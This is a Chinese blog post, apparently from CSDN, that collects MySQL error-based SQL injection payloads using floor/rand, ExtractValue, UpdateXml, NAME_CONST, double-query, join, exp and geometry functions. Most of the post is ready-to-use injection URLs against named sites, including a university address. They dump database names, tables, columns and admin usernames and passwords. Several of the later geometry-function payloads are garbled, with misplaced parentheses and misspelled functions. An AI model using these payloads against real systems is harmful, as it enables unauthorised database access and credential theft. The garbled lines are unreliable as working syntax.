报错注入的一些整理 By Assassin

最新推荐文章于 2024-05-14 20:07:13 发布
最新推荐文章于 2024-05-14 20:07:13 发布
阅读量1.2k 收藏
点赞数
分类专栏: Web

mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法

SQL注入

1、通过floor暴错
/数据库版本/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/简单办法暴库/
http://www.waitalone.cn/sql.php?id=info()

/连接用户/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/连接数据库/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴库/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴表/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴字段/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/暴内容/
http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

2、ExtractValue(有长度限制,最长32位)
http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e))

http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

3、UpdateXml(有长度限制,最长32位)
http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

4、NAME_CONST(适用于低版本)
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)–

5、Error based Double Query Injection
(http://www.vaibs.in/error-based-double-query-injection/)

/数据库版本/
http://www.waitalone.cn/sql.php?id=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

转自独自等待前辈的博客
https://www.waitalone.cn/mysql-error-based-injection.html

6.知道库名表名和一条列名得到下一条列名

在知道库名、表名后,可以利用报错注入得到列名
pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id))c)
得到下一列pro_name,继续报错
pro_id=0 and (select * from (select * from youcanneverfindme17.product_2017ctf a join youcanneverfindme17.product_2017ctf b using (pro_id,pro_name))c)

补充一些嗯

1、通过NAME_CONST报错,注入语句如下:
and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

2、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

3、通过exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );

4、通过GeometryCollection()报错,注入语句如下:
and GeometryCollection(()select *from(select user () )a)b );

5、通过polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );

6、通过multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );

7、通过multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(selectuser () )a)b );

8、通过multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(selectuser () )a)b );

9、通过linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );
Assassin__is__me
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SniperOJ Web by Assassin
Assassin
09-02 3101
md5-vs-injection好久不做题了 肯定是文件泄露了,猜测容易得到index.phps泄露文件,然后看一下是啥<?php $flag = 'SniperOJ{********************}'; if(isset($_POST['password'])){ $current_password = "QNKCDZO"; $password
Seacms漏洞分析利用复现 By Assassin
qq_43679818的博客
11-13 328
Seacms漏洞分析利用复现 By Assassin
实验吧 加了料的报错注入 再见报错注入
Assassin
01-31 1972
本题怎么说,细思之下并不是很难,为什么记录一下,一个是之前对报错注入的利用方式实在是太过于简单,简直不知道怎么用,一个是确实手生了很多吧。 言归正传,这个题目还是一般有意思的(不是我自己做的,但是想记录一下) 现在还是体会到了动手之前要把准备工作准备好了 首先看一下界面,随手输入一直显示注入失败,而且我们看到了网页中的提示sql语句是<!-- $sql="select * from users
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
最新发布
2401_84971615的博客
05-14 679
适用情况:页面有数据库的报错信息报错信息必须是动态的、来自数据库的报错信息。网站写死的、自定义的报错提示不算。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
实验吧 登陆一下好吗 简单注入 By Assassin
qq_43679818的博客
11-13 135
实验吧 登陆一下好吗 简单注入 By Assassin
蓝桥杯 带分数 By Assassin
Assassin
12-15 276
准备蓝桥杯吧,我很水,参加一下这种简答的比赛的。问题描述 100 可以表示为带分数的形式:100 = 3 + 69258 / 714。还可以表示为:100 = 82 + 3546 / 197。注意特征:带分数中,数字1~9分别出现且只出现一次(不包含0)。类似这样的带分数,100 有 11 种表示法。输入格式 从标准输入读入一个正整数N (N<1000*1000)输出格式 程序输出该数字用数码
jarvis oj Web By Assassin
qq_43679818的博客
01-10 1009
jarvis oj Web By Assassin
Codeforces 731C Socks By Assassin
Assassin
10-22 303
题目大意 有n只袜子,有至多k种颜色,给你m天的安排,要你穿两只,要保证两只袜子同色。每只袜子可以至多染一次色。 问最小的染色次数。 思路: 讲真的一开始没想到用搜索,事实上题目可以这么理解,我的第i只袜子可能与之前之后都有联系,那么袜子最后肯定会分成几个堆,堆之间没关系。给个数据 10 3 2 2 1 1 2 1 1 2 1 2 2 4 10 9 3 5 7 三
51nod 1272 最大距离 By Assassin
Assassin
11-01 359
1272 最大距离 题目来源: Codility 基准时间限制:1 秒 空间限制:131072 KB 分值: 20 难度:3级算法题 收藏 关注 给出一个长度为N的整数数组A,对于每一个数组元素,如果他后面存在大于等于该元素的数,则这两个数可以组成一对。每个元素和自己也可以组成一对。例如:{5, 3, 6, 3, 4, 2},可以组成11对,如下(数字为下标): (0,0), (0
Wechall writeup By Assassin
热门推荐
Assassin
08-25 1万+
不得不说wechall的题目还是挺有趣的,外国的题目感觉和国内的题目不太一样,真是学习学习了,wp持续跟新Prime Factory #_*_ coding:utf-8 _*_ import math def is_prime(num): for i in range(2,int(math.sqrt(num))+1): if num%i==0: ret
Assassin's Creed Brotherhood SAVE
04-25
Assassin's Creed Brotherhood SAVE
class Assassin.docx
01-02
在给定的代码中,我们看到了两个Python类的定义:`Assassin` 和 `Master`。这两个类代表了游戏中的角色,每个角色都有特定的属性和能力。让我们深入了解一下这些类以及它们所体现的面向对象编程概念。 首先,`...
Elven Assassin.unitypackage
03-30
Elven Assassin,Unity3d模型资源,单个女性模型,没有动画。也没有其它道具。类似于手办模型,有个圆形底座,模型站在底座上。
Silent Assassin-开源
04-27
"Silent Assassin-开源"是一款基于OpenGL技术开发的3D第一人称射击游戏,它专为那些熟悉C++编程但对OpenGL图形库不甚了解的程序员设计。OpenGL是一种跨语言、跨平台的编程接口,用于渲染2D、3D矢量图形。在这款游戏...
assassin-king
05-11
刺客王 发展 从./client/js/运行watchify main.js -o bundle.js ./client/js/ 使用npm start启动服务器 在localhost:1337打开许多选项卡
Assassin's Creed Origins Wallpapers Tab-crx插件
04-06
assassin的信条起源起来的游戏高清壁纸和浏览器的新选项卡主题。以下是我们的新刺客的信条来源延期,非常适合这场比赛的所有粉丝和整个特许经营。它为酷炫的壁纸提供了惊人的质量,将为您的浏览器提供完整的新鲜...
assassin:2D暗杀游戏
04-19
刺客2D暗杀游戏你是个无法无天的杀手。 您的目标将无情地吸引您。 你对什么感兴趣呢? 它代表的总和。用户功能该项目正在进行中,并且可能会朝着未知的方向发展移动刺客避免被发现落在目标上以消除它
Templar Assassin
04-02
Templar Assassin is a hero in the popular online multiplayer game Dota 2. She is a melee agility hero with excellent burst damage and mobility, making her a formidable assassin. Her abilities include ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值